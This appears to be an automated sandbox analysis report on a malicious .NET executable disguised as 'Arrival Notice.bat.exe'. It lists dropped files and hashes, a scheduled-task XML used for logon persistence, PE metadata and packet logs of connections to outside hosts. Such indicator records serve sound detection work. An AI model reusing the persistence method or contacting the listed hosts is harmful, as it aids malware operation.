                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                            Process:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1301
                                                                            Entropy (8bit):5.334025345208678
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                                                            MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                                                            SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                                                            SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                                                            SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                            Process:C:\Windows\SysWOW64\compact.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):695808
                                                                            Entropy (8bit):7.940166802607003
                                                                            Encrypted:false
                                                                            SSDEEP:12288:ZFIsPAfpZOTgzeVDNTTPUz8mFRavsE9+dPKX38ctePh0E3m1BJSVYRrxNn:/IKGOcz6NPPK88EUh28ctcmL1Nn
                                                                            MD5:BD0CF4524C08026BA27005393E1F93A9
                                                                            SHA1:EDBC879DB8194B28F0CB398D180A593791954B76
                                                                            SHA-256:795551251C9B793C9E834D3EE0764B6D29D9B6716EF78349CB771AB462DDF104
                                                                            SHA-512:6BF1EE5EE504A52E3E974CAFD7A172B1317D4B6CD7BCC198EC57DBDF0BDB7019E4ADBB3F036D75C2D80E128B52D006ECD5791FBA7D33297AB39A9B1C2F16EC11
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                            Joe Sandbox View:
                                                                            • Filename: Arrival Notice.bat.exe, Detection: malicious, Browse
                                                                            • Filename: AWB_NO_907853880911.exe, Detection: malicious, Browse
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):2232
                                                                            Entropy (8bit):5.379879166934507
                                                                            Encrypted:false
                                                                            SSDEEP:48:wWSU4y4RdymloUeW+gZ9tK8NPZHUxL7u1iMugeoPUyus:wLHyIdvqLgZ2KRHWLOugYs
                                                                            MD5:F241772F74BAA67309FE5FCF8B2AA90C
                                                                            SHA1:46A76E41F9E0AC02479F68D35D9BB25921515848
                                                                            SHA-256:50AC4970E5E6228BE0684E12F03A31CF964FF0FFE34C4258F53C7E16CE549429
                                                                            SHA-512:D100B56B382654E06E2D9F6B9B40E27C64A71F3E6D33BC8884DAA37CFD6FD47855B74D2EB850D51AE9AFDF9B492E85CFA2ECD4A0AFD9FA5B99B83E0796625053
                                                                            Malicious:false
                                                                            Preview:@...e.................................X..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                            Process:C:\Windows\SysWOW64\runonce.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                            Category:dropped
                                                                            Size (bytes):114688
                                                                            Entropy (8bit):0.9746603542602881
                                                                            Encrypted:false
                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\compact.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                            Category:dropped
                                                                            Size (bytes):114688
                                                                            Entropy (8bit):0.9746603542602881
                                                                            Encrypted:false
                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            File Type:XML 1.0 document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1572
                                                                            Entropy (8bit):5.109412701459857
                                                                            Encrypted:false
                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxaxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTiuv
                                                                            MD5:B8DE27F90D0562C8203EE8D10EF13718
                                                                            SHA1:6D1EC0AC0889806C636E6B7EA37BBBD9656C23BE
                                                                            SHA-256:CD2BA3E9BC9BF0F61D7A154FA489A1612DFB83A9291DED0F9C1D52BD31F303A7
                                                                            SHA-512:E3CF63A5D5A219546913AD61485E06217BE6B56398EEDA31B9FDC53ADC6E0E2C02CCE3144039CCF33D269A38214596ADC669D0C8801229642C8E90C9B682CC7A
                                                                            Malicious:true
                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                            Process:C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                            File Type:XML 1.0 document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1572
                                                                            Entropy (8bit):5.109412701459857
                                                                            Encrypted:false
                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxaxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTiuv
                                                                            MD5:B8DE27F90D0562C8203EE8D10EF13718
                                                                            SHA1:6D1EC0AC0889806C636E6B7EA37BBBD9656C23BE
                                                                            SHA-256:CD2BA3E9BC9BF0F61D7A154FA489A1612DFB83A9291DED0F9C1D52BD31F303A7
                                                                            SHA-512:E3CF63A5D5A219546913AD61485E06217BE6B56398EEDA31B9FDC53ADC6E0E2C02CCE3144039CCF33D269A38214596ADC669D0C8801229642C8E90C9B682CC7A
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                            Process:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):688640
                                                                            Entropy (8bit):7.930609058885228
                                                                            Encrypted:false
                                                                            SSDEEP:12288:E6L6MFvj7DxzQUrHEXZ9D0jE/iGYYmtPwtEUKL8IL55lsEG+:PxzQ3r9/vJSPwmUKL8IFso
                                                                            MD5:615F92F0ECEF4EB70DE1C52CEE091948
                                                                            SHA1:8213AC015B088C484E7FFF3317E4E32D91B933CF
                                                                            SHA-256:48DCD87FC8E5DCA5CAA5788EE49D6CBDF1F8C76F789B2FD619665A07AF9B5C57
                                                                            SHA-512:E47300508C77DE3D20EB65E317A2218055EC252DA33BBFEBC8E2CE1A5313FF173FA1C66EDD1AA1E1B0D2DCC0D51FCE6775FA53F4C9ABF9C399D26AD704F4A5D0
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                            Process:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.930609058885228
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:Arrival Notice.bat.exe
                                                                            File size:688'640 bytes
                                                                            MD5:615f92f0ecef4eb70de1c52cee091948
                                                                            SHA1:8213ac015b088c484e7fff3317e4e32d91b933cf
                                                                            SHA256:48dcd87fc8e5dca5caa5788ee49d6cbdf1f8c76f789b2fd619665a07af9b5c57
                                                                            SHA512:e47300508c77de3d20eb65e317a2218055ec252da33bbfebc8e2ce1a5313ff173fa1c66edd1aa1e1b0d2dcc0d51fce6775fa53f4c9abf9c399d26ad704f4a5d0
                                                                            SSDEEP:12288:E6L6MFvj7DxzQUrHEXZ9D0jE/iGYYmtPwtEUKL8IL55lsEG+:PxzQ3r9/vJSPwmUKL8IFso
                                                                            TLSH:47E41284B36A7B31D13957F92C72304043FCA23752B4EBAAED9B21DA4172F4546E0E57
                                                                            Icon Hash:90cececece8e8eb0
                                                                            Entrypoint:0x4a970a
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0xC0621386 [Tue Apr 12 02:16:38 2072 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa96b5 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x5bc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa7c94 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa7710 | 0xa7800 | 3a6b5df358846bf6973e1dd66f0c94b7 | False | 0.9335791744402985 | DOS executable (COM) | 7.936469180639003 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xaa000 | 0x5bc | 0x600 | 8df10943c02d473c5f827c94a064d12b | False | 0.43359375 | data | 4.12119683020114 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xac000 | 0xc | 0x200 | 1e107760511e270341c711fce622bb27 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xaa090 | 0x32c | data | | | 0.4421182266009852
RT_MANIFEST | 0xaa3cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                            Jun 19, 2024 22:39:50.968319893 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968347073 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968508005 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968534946 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968580961 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:50.968607903 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.176877975 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.176923037 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.176981926 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177031040 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177037954 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177086115 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177123070 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177143097 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177175045 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177210093 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177216053 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177242041 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177277088 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177282095 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177408934 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177454948 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177584887 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.470763922 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:53.490056038 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:53.495168924 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:53.498131037 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:53.502044916 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:53.506930113 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473053932 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473103046 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473134995 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473169088 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473169088 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.473201036 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473234892 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473251104 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.473267078 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473283052 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.473299026 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473330021 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473347902 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.473364115 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473407984 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.478180885 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.533190966 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.712125063 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712163925 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712266922 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.712322950 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712568998 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712616920 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.712619066 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712651968 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712683916 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712701082 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.713089943 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713139057 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.713143110 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713176966 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713232994 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.713303089 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713335037 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713382006 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.713984013 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.714057922 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.714103937 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.714106083 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.714463949 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.714514017 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.718214035 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.723249912 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:40:07.840234995 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:07.846033096 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:07.846218109 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:07.849802017 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:07.855266094 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.470860004 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.470916986 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.470953941 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.470988035 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471021891 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471040964 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.471040964 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.471056938 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471091986 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471112013 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.471126080 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471160889 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471188068 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.471196890 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471251011 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.476663113 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.476713896 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.476752043 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.476905107 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.561573982 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.562906981 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.562954903 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.562994003 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.563000917 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.563051939 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:09.361510038 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.379600048 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.385226011 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.385333061 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.387191057 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.392539024 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974095106 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974159956 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974195957 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974229097 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974262953 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974296093 CEST8049762162.0.213.94192.168.2.4
